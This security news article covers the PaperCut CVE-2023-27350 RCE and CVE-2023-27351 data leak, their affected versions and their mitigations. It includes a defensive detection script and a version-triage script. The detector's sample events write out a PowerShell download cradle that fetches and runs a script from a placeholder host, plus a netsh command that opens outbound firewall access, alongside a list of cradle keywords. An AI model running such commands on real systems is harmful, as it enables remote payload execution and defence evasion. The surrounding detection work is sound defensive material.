PaperCut Vulnerability Allows RCE, Exploited in the Wild

PaperCut Contains Two Critical Vulnerabilities
Two CVEs in PaperCut allow RCE and account data extraction

PaperCut, a print management product, contains an unauthenticated remote code execution (RCE) vulnerability. A second flaw disclosed alongside it lets an unauthenticated attacker pull user data from the profiles stored on the server. The RCE vulnerability is already being exploited in the wild.

What is PaperCut?

PaperCut is a print management solution that gives administrators control over how printers are used. It provides print job tracking, print quotas, cost allocation and secure print release, among other features. Secure print release in particular exists to stop documents from leaking inside the company, since a job is only printed once the owner authenticates at the device. The software supports a wide range of printers, scanners and similar devices. It is widely deployed: the vendor's own figures cite more than 100 million users worldwide. An exploitable flaw in something that common is a serious problem.

Two Vulnerabilities Found in PaperCut Software

Two vulnerabilities have been disclosed in PaperCut: one is bad, the other is far worse. Start with the worst. CVE-2023-27350 allows remote code execution (RCE) without any authentication. RCE vulnerabilities are among the most dangerous classes, and a CVSS score above 9 is common for them. This one received 9.8, the same score as the recently disclosed MSMQ vulnerability.

Worse still, criminals have already used this vulnerability in real attacks. Trend Micro reported attackers exploiting the RCE to run a PowerShell script on the PaperCut server. That script downloaded a ransomware payload while bypassing the passive security controls present on the network. The attackers used the Windows Network Shell (netsh) utility to get past firewall restrictions. Another notable feature of the attack is the use of a temporary file-hosting service for payload delivery: the file is deleted from the host automatically after 60 minutes, leaving investigators little to retrieve.
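The chain above has a simple behavioural signature: the PaperCut application server process (pc-app.exe on Windows) should never spawn a shell, and the follow-on steps (a PowerShell download cradle, a netsh firewall change) are themselves suspicious. The following detection logic, written for this article and not taken from PaperCut or Trend Micro, runs that check over process-creation events. The pipe-separated event format and the sample events are constructed for the example; the hostname, URL and file names in them are placeholders.

```python
"""Detection over process-creation events for the PaperCut RCE chain:
pc-app.exe spawning a shell, a PowerShell download cradle, and a netsh
firewall change. Added example; the event format and sample events are
constructed, not taken from a real host."""
from dataclasses import dataclass, field

PAPERCUT_SERVER = "pc-app.exe"          # PaperCut MF/NG application server on Windows
SHELLS_AND_LOLBINS = {"cmd.exe", "powershell.exe", "pwsh.exe", "netsh.exe",
                      "wscript.exe", "cscript.exe", "certutil.exe", "bitsadmin.exe"}
DOWNLOAD_CRADLES = ("downloadstring", "downloadfile", "invoke-webrequest",
                    "iwr ", "invoke-expression", "iex(", "iex ")

# Constructed sample events: timestamp|parent image|child image|command line
SAMPLE_EVENTS = r"""2023-04-20T10:01:02Z|C:\Program Files\PaperCut MF\server\bin\win\pc-app.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -c "IEX((New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1'))"
2023-04-20T10:01:05Z|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\netsh.exe|netsh advfirewall firewall add rule name="upd" dir=out action=allow program="C:\Windows\Temp\upd.exe"
2023-04-20T10:02:00Z|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe
2023-04-20T10:03:00Z|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe Get-Service Spooler"""


@dataclass
class Finding:
    line_no: int
    child: str
    reasons: list = field(default_factory=list)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(parent: str, child: str, command: str) -> list:
    """Return the reasons an event is suspicious (empty list if none)."""
    reasons = []
    p, c, cmd = basename(parent), basename(child), command.lower()
    if p == PAPERCUT_SERVER and c in SHELLS_AND_LOLBINS:
        # The print server has no legitimate reason to launch a shell or
        # LOLBin; this is the direct footprint of the RCE being used.
        reasons.append("pc-app.exe spawned " + c)
    if c in ("powershell.exe", "pwsh.exe") and any(k in cmd for k in DOWNLOAD_CRADLES):
        reasons.append("PowerShell download cradle")
    if c == "netsh.exe" and "firewall" in cmd:
        reasons.append("netsh firewall change")
    return reasons


def analyse(events: str) -> list:
    """Run classify() over every event line; skip malformed lines."""
    findings = []
    for n, line in enumerate(events.splitlines(), start=1):
        try:
            _ts, parent, child, command = line.split("|", 3)
        except ValueError:
            continue  # malformed line: skip it rather than stop the pipeline
        reasons = classify(parent, child, command)
        if reasons:
            findings.append(Finding(n, basename(child), reasons))
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"line {f.line_no}: {f.child}: {'; '.join(f.reasons)}")
```

In the sample, lines 1 and 2 are flagged (the first for two reasons, the second for the firewall change) while the two explorer.exe children are not. The parent/child rule is the one worth deploying on its own in EDR or Sysmon tooling; the cradle and netsh rules are noisier and are better used to raise the severity of an existing hit.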

PaperCut RCE Vulnerability exploitation scheme

CVE-2023-27351 is less severe but still unpleasant. It also requires no authentication, but this time the target is user information rather than code execution. An attacker can extract users' full names, usernames, email addresses and even the card numbers associated with their accounts, all taken from the user profiles held on the PaperCut MF/NG application server. Data like this gives an attacker the material for credential attacks against PaperCut accounts and for targeted phishing.

List of PaperCut software vulnerable to the two CVEs:

CVE-2023-27350 (RCE)
  Application servers: PaperCut MF/NG v8.0 or later
  Site servers: PaperCut MF/NG v15.0 or later

CVE-2023-27351 (information disclosure)
  Application servers: PaperCut MF/NG v15.0 or later

How to Protect Against PaperCut Vulnerability?

Fortunately for the organisations that run it, the vendor has acknowledged the issue and released security updates: PaperCut MF/NG 20.1.7, 21.2.11 and 22.0.9 contain the fix, and older branches (8.x through 19.x) receive no patch and must be upgraded. The vendor recommends installing the fixed version as soon as possible. Where that cannot happen immediately, PaperCut's advisory also recommends restricting inbound access to the web management interface (ports 9191 and 9192) to an allow list of trusted addresses, since both flaws are reached through that interface. Such a rapid vendor response is welcome, but companies tend to delay updates for reasons that are often hard to remove, so preventive measures deserve attention as well.
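Deciding whether a given server needs the update is a matter of comparing its version against the fixed releases and the affected ranges from the vendor advisory. The triage function below is an added example written for this article, not a PaperCut tool. It assumes the version string as shown on the server's About page (a build suffix such as "22.0.8 (Build 65246)" is tolerated and ignored) and treats 23.x and later, which shipped after the fixes, as patched.

```python
"""Version triage for CVE-2023-27350 and CVE-2023-27351. Fixed releases and
affected ranges follow the PaperCut advisory; the function is an added example
and assumes versions 23.0 and later (released after the fixes) are patched."""

# First fixed release per supported branch.
FIXED_BY_BRANCH = {20: (20, 1, 7), 21: (21, 2, 11), 22: (22, 0, 9)}

CVE_RCE = "CVE-2023-27350"
CVE_INFO = "CVE-2023-27351"


def parse_version(text: str) -> tuple:
    """'22.0.8' -> (22, 0, 8). Missing components count as 0 and any build
    suffix after the first whitespace ('22.0.8 (Build 65246)') is ignored."""
    core = text.strip().split()[0]
    parts = [int(p) for p in core.split(".") if p.isdigit()]
    if not parts:
        raise ValueError(f"unrecognised version string: {text!r}")
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def is_patched(version: tuple) -> bool:
    major = version[0]
    if major >= 23:
        return True  # assumption: branches released after the fix carry it
    fixed = FIXED_BY_BRANCH.get(major)
    # Branches 8.x to 19.x have no fixed release at all: they must be upgraded.
    return fixed is not None and version >= fixed


def applicable_cves(version_text: str, role: str) -> list:
    """Return the CVEs that apply to a server of the given role.
    role is 'application' (Application Server) or 'site' (Site Server)."""
    if role not in ("application", "site"):
        raise ValueError("role must be 'application' or 'site'")
    v = parse_version(version_text)
    if is_patched(v):
        return []
    cves = []
    # RCE: application servers from 8.0, site servers from 15.0.
    if (role == "application" and v >= (8, 0, 0)) or (role == "site" and v >= (15, 0, 0)):
        cves.append(CVE_RCE)
    # Information disclosure: application servers from 15.0 only.
    if role == "application" and v >= (15, 0, 0):
        cves.append(CVE_INFO)
    return cves


if __name__ == "__main__":
    for ver, role in [("22.0.8 (Build 65246)", "application"), ("22.0.9", "application"),
                      ("19.0.3", "site"), ("14.3", "application"), ("7.5", "application")]:
        print(f"{ver:22} {role:12} -> {applicable_cves(ver, role) or 'not affected'}")
```

A server at 22.0.8 reports both CVEs, 22.0.9 reports none, and a 19.x site server reports only the RCE, which is exactly the case the table in the previous section describes: there is no patch for that branch, so the only fix is an upgrade.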

The most effective protection against exploitation is endpoint security that follows a zero-trust policy: no process is trusted by default, and each action is judged on its behaviour. Modern EDR/XDR products generally work this way, and it gives far better coverage against current threats than signature matching alone. In this case the tell-tale behaviour is obvious, since a print server process has no reason to launch PowerShell or modify firewall rules. Such tooling has costs in tuning and false positives, but they are small compared to the consequences of a ransomware attack or APT activity.

A further layer is active network protection. As mentioned above, the attackers used netsh to alter firewall restrictions and reach the file host. Network Detection and Response systems observe traffic on the wire rather than on the compromised host, so a firewall rule added with netsh does not hide the outbound download from them. They also make it much easier to reconstruct an attack (or an attempted one) afterwards and to take urgent reactive measures.

By Stephanie Adlam

I write about how to make your Internet browsing comfortable and safe. The modern digital world is worth being a part of, and I want to show you how to do it properly.
